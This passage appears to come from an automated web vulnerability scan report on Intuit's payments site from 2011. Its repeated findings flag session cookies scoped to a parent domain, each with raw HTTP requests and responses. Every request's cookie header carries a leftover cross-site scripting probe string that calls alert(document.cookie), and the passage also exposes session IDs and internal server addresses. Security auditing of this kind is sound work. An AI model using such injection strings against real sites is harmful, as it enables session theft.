Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D9558F560A0805192AA117E38514C1B8
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=index_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Vary: Accept-Encoding
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 90285

...[SNIP]...

2.6. http://payments.intuit.com/products/basic-payment-solutions/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://payments.intuit.com
Path:   /products/basic-payment-solutions/

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /products/basic-payment-solutions/ HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 16:53:06 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=N1WxP2tCjmwle9wWUIZ0ZA**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:30:07 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95590A10A0805192AA117E393511CD3
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=index_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Vary: Accept-Encoding
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 92523

...[SNIP]...

2.7. http://payments.intuit.com/products/basic-payment-solutions/check-processing.jsp

Summary

Severity:   Low
Confidence:   Firm
Host:   http://payments.intuit.com
Path:   /products/basic-payment-solutions/check-processing.jsp

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /products/basic-payment-solutions/check-processing.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 16:53:10 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=ymN4fXSK4DMbTyTO7aM1cg**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:30:11 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D955A0C80A0805192AA117E31BD1DFC9
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=check_002dprocessing_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 101690

...[SNIP]...

2.8. http://payments.intuit.com/products/basic-payment-solutions/credit-card-processing-equipment.jsp

Summary

Severity:   Low
Confidence:   Firm
Host:   http://payments.intuit.com
Path:   /products/basic-payment-solutions/credit-card-processing-equipment.jsp

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /products/basic-payment-solutions/credit-card-processing-equipment.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 16:53:10 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=Nxf9rXE5DPm2krW37+O0eA**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:30:11 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D9559E7F0A0805192AA117E31396879F
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=credit_002dcard_002dprocessing_002dequipment_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 134799

...[SNIP]...

2.9. http://payments.intuit.com/products/basic-payment-solutions/index.jsp

Summary

Severity:   Low
Confidence:   Firm
Host:   http://payments.intuit.com
Path:   /products/basic-payment-solutions/index.jsp

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /products/basic-payment-solutions/index.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 16:53:10 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=e8x54NAl9m5AKOxJR+wP-A**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:30:11 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D955A0A60A0805192AA117E3A81180D3
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=index_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 92524

...[SNIP]...

2.10. http://payments.intuit.com/products/basic-payment-solutions/mobile-credit-card-processing.jsp

Summary

Severity:   Low
Confidence:   Firm
Host:   http://payments.intuit.com
Path:   /products/basic-payment-solutions/mobile-credit-card-processing.jsp

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /products/basic-payment-solutions/mobile-credit-card-processing.jsp?scid=ips_gopay_free_card_reader_banner HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 16:53:07 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=b0cWeAq2eG1uGvhkSVuNFw**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:30:08 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95591890A0805192AA117E3A5843518
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=mobile_002dcredit_002dcard_002dprocessing_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 151680

...[SNIP]...

2.11. http://payments.intuit.com/products/basic-payment-solutions/quicken-merchant-services.jsp

Summary

Severity:   Low
Confidence:   Firm
Host:   http://payments.intuit.com
Path:   /products/basic-payment-solutions/quicken-merchant-services.jsp

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /products/basic-payment-solutions/quicken-merchant-services.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 16:53:11 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=9-HAeogU3gmn3wP+HGc0sw**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:30:12 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D955A3400A0805192AA117E3F700FFB1
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=quicken_002dmerchant_002dservices_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 110626


                                                                                                                                                                                                                                                                                                                                                                                                                                   
...[SNIP]...

2.12. http://payments.intuit.com/products/check-processing-solutions/check-processing-solution.jsp

Summary

Severity:   Low
Confidence:   Firm
Host:   http://payments.intuit.com
Path:   /products/check-processing-solutions/check-processing-solution.jsp

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /products/check-processing-solutions/check-processing-solution.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 16:53:27 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=rWG2KKyS6ZfhueJSH9YbTQ**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:30:28 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D955E2760A0805192AA117E38F42E01B
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=check_002dprocessing_002dsolution_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 96334


                                                                                                                                                                                                                                                                                                                                                                                                               
...[SNIP]...

2.13. http://payments.intuit.com/products/check-processing-solutions/online-check-service.jsp

Summary

Severity:   Low
Confidence:   Firm
Host:   http://payments.intuit.com
Path:   /products/check-processing-solutions/online-check-service.jsp

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /products/check-processing-solutions/online-check-service.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 16:53:31 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=UfcQ4hB5tvap88Kpn1as6w**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:30:32 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D955F0AB0A0805192AA117E3D78B52E9
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=online_002dcheck_002dservice_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 109298


                                                                                                                                                                                                                                                                                                                                                                                                                                   
...[SNIP]...

2.14. http://payments.intuit.com/products/echecks-and-check-processing.jsp

Summary

Severity:   Low
Confidence:   Firm
Host:   http://payments.intuit.com
Path:   /products/echecks-and-check-processing.jsp

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /products/echecks-and-check-processing.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
